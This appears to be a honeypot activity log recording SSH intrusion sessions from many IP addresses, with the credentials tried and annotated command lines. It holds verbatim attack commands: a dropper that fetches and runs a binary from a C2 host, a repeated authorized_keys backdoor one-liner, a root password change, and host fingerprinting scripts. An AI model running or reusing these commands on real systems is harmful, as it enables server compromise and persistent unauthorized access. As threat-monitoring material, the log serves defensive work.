$ nohup $SHELL -c "curl http://175.178.76.228:9726/linux -o /tmp/y7EMYxZy9x; if [ ! -f /tmp/y7EMYxZy9x ]; then wget http://175.178.76.228:9726/linux -O /tmp/y7EMYxZy9x; fi; if [ ! -f /tmp/y7EMYxZy9x ]; then exec 6<>/dev/tcp/175.178.76.228/9726 && echo -n 'GET /linux' >&6 && cat 0<&6 > /tmp/y7EMYxZy9x ; chmod +x /tmp/y7EMYxZy9x && /tmp/y7EMYxZy9x 9QB9E6Vuhr8nxS7EJaOEbK0MdwCMjw53Cad0jKEu2DPGLKmNaK0ddBKLlhVyE6FrkKAuxTrAIaGJeqUMdQ6MiA50C6N0jacszzjFILGPbaETdBeAlhdzE6ZohqsvwTLANqCObLoIcQ6KiBdrD6BshKcgxzHWJ6CPdKEEaxGPig53DaFgh6cmwiDCIb+PaqMTcxOWihZ/BaVoibEkxjLYJ6GLdKUFfA6JjRZ/BKZuibEkxDDYJ6eLdKwNaxKJiBp8DqNpnqUh2DLFL7+PY6UTdBePghZ3CqR6j6Mi2DLEJb+LbLoEcxqPjxZ3HaBtkKAnwC7HJKSQaawHfROKigB9DLptj78nzi7CIauGYqEIZRGLjA50CqF0iKc4xzLFLKmMbacddBCLlhJ2C7pti78uwDrAJqWMeqAKaxGIjw5zDrpoiKsuxzLBNqSGdKwKaxeJlhJxBa5tjaYv1jjHOKaOdKYFaxmBghh3C6B6j6An2DXPOKCJaLoPdRWCgRZ1CbRuib8kxTnYJ6iPdKUKchqOihd1HaBtkKMixS7EJqmQaaQHfROKgQBxBLpojaQ4xzbOOKCGaK4KchaOmBF3CbpojKA4wDjYJ6WOYKMFfBOYiRF0E6Zoh78nwC7EJ6SEba0PfQCJiRFrD6ZjkKAkwS7EJKGEY6YNdgCAiQ5yDbppjr8kxTbMIKOLarQMdRaWiRNrD6d0j6UvzDbOJ6iea6cEaxGBgQ50C6R0j6AgzDfCIaKea6cJaxGPjQ5zC7prjKIszjLBJUnqOVbnJPpsNQlu/yP9RH5za3zK8YOW; fi; echo 123456 > /tmp/.opass; chmod +x /tmp/y7EMYxZy9x && /tmp/y7EMYxZy9x 9QB9E6Vuhr8nxS7EJaOEbK0MdwCMjw53Cad0jKEu2DPGLKmNaK0ddBKLlhVyE6FrkKAuxTrAIaGJeqUMdQ6MiA50C6N0jacszzjFILGPbaETdBeAlhdzE6ZohqsvwTLANqCObLoIcQ6KiBdrD6BshKcgxzHWJ6CPdKEEaxGPig53DaFgh6cmwiDCIb+PaqMTcxOWihZ/BaVoibEkxjLYJ6GLdKUFfA6JjRZ/BKZuibEkxDDYJ6eLdKwNaxKJiBp8DqNpnqUh2DLFL7+PY6UTdBePghZ3CqR6j6Mi2DLEJb+LbLoEcxqPjxZ3HaBtkKAnwC7HJKSQaawHfROKigB9DLptj78nzi7CIauGYqEIZRGLjA50CqF0iKc4xzLFLKmMbacddBCLlhJ2C7pti78uwDrAJqWMeqAKaxGIjw5zDrpoiKsuxzLBNqSGdKwKaxeJlhJxBa5tjaYv1jjHOKaOdKYFaxmBghh3C6B6j6An2DXPOKCJaLoPdRWCgRZ1CbRuib8kxTnYJ6iPdKUKchqOihd1HaBtkKMixS7EJqmQaaQHfROKgQBxBLpojaQ4xzbOOKCGaK4KchaOmBF3CbpojKA4wDjYJ6WOYKMFfBOYiRF0E6Zoh78nwC7EJ6SEba0PfQCJiRFrD6ZjkKAkwS7EJKGEY6YNdgCAiQ5yDbppjr8kxTbMIKOLarQMdRaWiRNrD6d0j6UvzDbOJ6iea6cEaxGBgQ50C6R0j6AgzDfCIaKea6cJaxGPjQ5zC7prjKIszjLBJUnqOVbnJPpsNQlu/yP9RH5za3zK8YOW" &
โ†ณ payload download from C2
$ head -c 3716336 > /tmp/M2MklXSOqP
โ†ณ execute from /tmp
$ echo 1 > /dev/null && cat /bin/echoQtd#0000
$ >A@/`'8
๐ŸŽญ molten_burger_root_78 (165.22.134.78) โ€” Santa Clara, United States ยท 1 session ยท 2 cmds
2026-07-01 20:16 EDT ยท as oracle/1qa2ws3ed
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ arctic_windmill_root (172.211.56.214) โ€” Amsterdam, Netherlands ยท 1 session ยท 2 cmds
2026-07-01 20:11 EDT ยท as oracle/Abcd1234
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ rusty_meatball_root (171.25.158.80) โ€” Vaxjo, Sweden ยท 1 session ยท 2 cmds
2026-07-01 20:01 EDT ยท as oracle/Abcd1234
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ sullen_phantom_root (181.115.147.5) โ€” Santa Cruz de la Sierra, Bolivia ยท 1 session ยท 2 cmds
2026-07-01 20:00 EDT ยท as oracle/1qa2ws3ed
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ scrappy_truck_root (110.38.234.222) โ€” Lahore, Pakistan ยท 1 session ยท 2 cmds
2026-07-01 20:00 EDT ยท as oracle/1qa2ws3ed
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ savage_strudel_db (88.198.188.142) โ€” Nuremberg, Germany ยท 1 session ยท 2 cmds
2026-07-01 19:44 EDT ยท as oracle/Abcd1234
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ midnight_lantern_root_93 (120.236.196.93) โ€” Guangzhou, China ยท 1 session ยท 1 cmd
2026-07-01 19:39 EDT ยท as ubuntu/ubuntu
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ ashen_crepe_root_28 (87.106.47.28) โ€” Paris, France ยท 1 session ยท 19 cmds
2026-07-01 17:04 EDT ยท as root/P@ssw0rd1!
file attribute tampering โ†’ SSH key persistence โ†’ CPU profiling โ†’ execute from /tmp โ†’ persistence setup
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
$ cat /proc/cpuinfo | grep name | wc -l
โ†ณ CPU profiling
$ echo "root:bVUXnRziaqVp"|chpasswd|bash
$ rm -rf /tmp/secure.sh; rm -rf /tmp/auth.sh; pkill -9 secure.sh; pkill -9 auth.sh; echo > /etc/hosts.deny; pkill -9 sleep;
โ†ณ execute from /tmp
$ cat /proc/cpuinfo | grep name | head -n 1 | awk '{print $4,$5,$6,$7,$8,$9;}'
โ†ณ CPU profiling
$ free -m | grep Mem | awk '{print $2 ,$3, $4, $5, $6, $7}'
$ ls -lh $(which ls)
$ which ls
$ crontab -l
โ†ณ persistence setup
$ w
โ†ณ logged-in users check
$ uname -m
$ cat /proc/cpuinfo | grep model | grep name | wc -l
โ†ณ CPU profiling
$ top
โ†ณ process monitoring
$ uname
โ†ณ OS identification
$ uname -a
โ†ณ OS/kernel identification
$ whoami
โ†ณ privilege check
$ lscpu | grep Model
$ df -h | head -n 2 | awk 'FNR == 2 {print $2;}'
๐ŸŽญ grumpy_liberty_root (69.229.227.44) โ€” Pensacola, United States ยท 1 session ยท 2 cmds
2026-07-01 16:58 EDT ยท as oracle/Aa123456
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ zealous_acai_root (185.100.215.213) โ€” Fortaleza, Brazil ยท 1 session ยท 2 cmds
2026-07-01 16:45 EDT ยท as oracle/Aa123456
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ jittery_eagle_root (184.168.21.211) โ€” Tempe, United States ยท 1 session ยท 2 cmds
2026-07-01 16:42 EDT ยท as oracle/Aa123456
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ feral_static_root (91.92.40.6) โ€” Varna, Bulgaria ยท 37 sessions ยท 168 cmds
2026-06-21 11:11 EDT ยท as admin/123456, admin/admin, admin/admin123
PATH normalization via export โ†’ OS fingerprinting with uname -s -v -n -m โ†’ kernel version extraction from /proc/version โ†’ OS release check via /etc/os-release โ†’ uptime retrieval from /proc/uptime โ†’ data sanitization via cut and redirect to /dev/null.
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); filter_output=$( ( export LANG=C LC_ALL=C; echo '===SHELL_BEHAVIOR==='; printf 'path_err='; ( ./xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; printf 'cmd_err='; ( xxxxxx 2>&1 || true ) | head -c 250; printf '\n'; echo '===DONE===' ) 2>&1 ); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"; echo "FILTER:$filter_output" ร—3
$ uname -s -v -n -m 2 > /dev/null ร—37
$ /bin/uname -s -v -n -m 2 > /dev/null ร—4
$ /usr/bin/uname -s -v -n -m 2 > /dev/null ร—4
$ busybox uname -s -v -n -m 2 > /dev/null ร—4
$ ( [ -f /proc/version ] ร—4
$ [ -f /proc/version ] ร—4
$ head -1 /proc/version | cut -d -f1 ร—4
$ [ -f /etc/os-release ] ร—4
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null || /bin/uname -s -v -n -m 2>/dev/null || /usr/bin/uname -s -v -n -m 2>/dev/null || busybox uname -s -v -n -m 2>/dev/null || ( [ -f /proc/version ] && head -1 /proc/version | cut -d' ' -f1 ) || ( [ -f /etc/os-release ] && grep '^ID=' /etc/os-release | cut -d= -f2 | tr -d '"' ) || echo ""); arch=$(uname -m 2>/dev/null || /bin/uname -m 2>/dev/null || /usr/bin/uname -m 2>/dev/null || busybox uname -m 2>/dev/null || ( [ -f /proc/cpuinfo ] && grep -q "lm" /proc/cpuinfo && echo x86_64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 8" /proc/cpuinfo && echo aarch64 ) || ( [ -f /proc/cpuinfo ] && grep -q "CPU architecture: 7" /proc/cpuinfo && echo armv7l ) || echo ""); uptime=$(cat /proc/uptime 2>/dev/null || busybox cat /proc/uptime 2>/dev/null); cpus=$(nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || busybox nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null); cpu_model=$( { grep -m1 -E "model name|Hardware" /proc/cpuinfo 2>/dev/null; lscpu 2>/dev/null | grep "Model name"; dmidecode -s processor-version 2>/dev/null; uname -p 2>/dev/null; busybox uname -p 2>/dev/null; } ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia; busybox lspci 2>/dev/null | grep -i vga; busybox lspci 2>/dev/null | grep -i nvidia) 2>/dev/null ); last_output=$(last 2>/dev/null); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "LAST:$last_output"
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—2
$ uname -m 2 > /dev/null ร—33
$ cat /proc/uptime 2 > /dev/null ร—2
$ export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:$PATH; uname=$(uname -s -v -n -m 2>/dev/null); arch=$(uname -m 2>/dev/null); uptime=$(cat /proc/uptime 2>/dev/null | cut -d. -f1); cpus=$( (nproc 2>/dev/null || /usr/bin/nproc 2>/dev/null || grep -c "^processor" /proc/cpuinfo 2>/dev/null) | head -1); cpu_model=$( (grep -m1 -E "model name|Hardware" /proc/cpuinfo | cut -d: -f2- | sed 's/^ *//;s/ *$//' ; lscpu 2>/dev/null | awk -F: '/Model name/ {gsub(/^ +| +$/,"",$2); print $2; exit}' ; dmidecode -s processor-version 2>/dev/null | head -n1 ; uname -p 2>/dev/null) | awk 'NF{print; exit}' ); gpu_info=$( (lspci 2>/dev/null | grep -i vga; lspci 2>/dev/null | grep -i nvidia) 2>/dev/null | head -n50); cat_help=$( (cat --help 2>&1 | tr '\n' ' ') || cat --help 2>&1); ls_help=$( (ls --help 2>&1 | tr '\n' ' ') || ls --help 2>&1); last_output=$(last 2>/dev/null | head -n 10); echo "UNAME:$uname"; echo "ARCH:$arch"; echo "UPTIME:$uptime"; echo "CPUS:$cpus"; echo "CPU_MODEL:$cpu_model"; echo "GPU:$gpu_info"; echo "CAT_HELP:$cat_help"; echo "LS_HELP:$ls_help"; echo "LAST:$last_output" ร—31
$ cat /proc/uptime 2 > /dev/null | cut -d. -f1 ร—31
๐ŸŽญ crimson_rendang_root (157.20.189.179) โ€” Ngaglik Timur, Indonesia ยท 1 session ยท 1 cmd
2026-07-01 08:56 EDT ยท as ubuntu/ubuntu
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -a
โ†ณ OS/kernel identification
๐ŸŽญ placid_ghost_root (91.92.40.124) โ€” Varna, Bulgaria ยท 22 sessions ยท 22 cmds
2026-07-01 05:13 EDT ยท as admin/123456, admin/admin123, admin/password
Ran uname 3x across 3 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—22
๐ŸŽญ brazen_ghost_root (81.192.46.49) โ€” Rabat, Morocco ยท 1 session ยท 2 cmds
2026-07-01 04:54 EDT ยท as oracle/0000
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ glitchy_rendang_root (69.5.23.222) โ€” Yogyakarta, Indonesia ยท 1 session ยท 2 cmds
2026-07-01 04:32 EDT ยท as oracle/0000
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ unhinged_samba_root (200.108.174.4) โ€” Bom Jesus das Selvas, Brazil ยท 1 session ยท 2 cmds
2026-07-01 04:32 EDT ยท as oracle/123
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
$ cd ~ && rm -rf .ssh && mkdir .ssh && echo "ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~
โ†ณ SSH key persistence
๐ŸŽญ drowsy_kopi_root (47.84.107.173) โ€” Singapore, Singapore ยท 21 sessions ยท 21 cmds
2026-06-30 13:39 EDT ยท as admin/123456, admin/admin, deploy/deploy
Ran uname 1x across 1 sessions โ€” automated OS fingerprinting.
$ uname -s -v -n -r -m ร—21
๐ŸŽญ spectral_muay_root (203.170.192.251) โ€” Huai Khwang, Thailand ยท 1 session ยท 2 cmds
2026-07-01 03:20 EDT ยท as oracle/1qaz!QAZ
file attribute tampering โ†’ SSH key persistence
$ cd ~; chattr -ia .ssh; lockr -ia .ssh
โ†ณ file attribute tampering
